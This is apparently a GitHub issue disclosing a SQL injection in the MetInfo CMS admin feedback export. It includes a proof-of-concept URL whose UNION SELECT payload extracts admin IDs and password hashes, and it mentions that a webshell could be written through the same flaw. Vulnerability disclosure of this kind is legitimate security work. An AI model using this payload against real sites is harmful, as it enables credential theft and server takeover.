Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Attackers can get arbitrary data from the database.Even use sql to write a webshell. POC:
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Attackers can get arbitrary data from the database.Even use sql to write a webshell.
POC:
1.First download the metinfo the Latest version from https://www.metinfo.cn/download/
2.Then install it and login as admin
3.Last request http://localhost/admin/index.php?n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(admin_id,0x7e,admin_pass)//from/**/met_admin_table
The text was updated successfully, but these errors were encountered: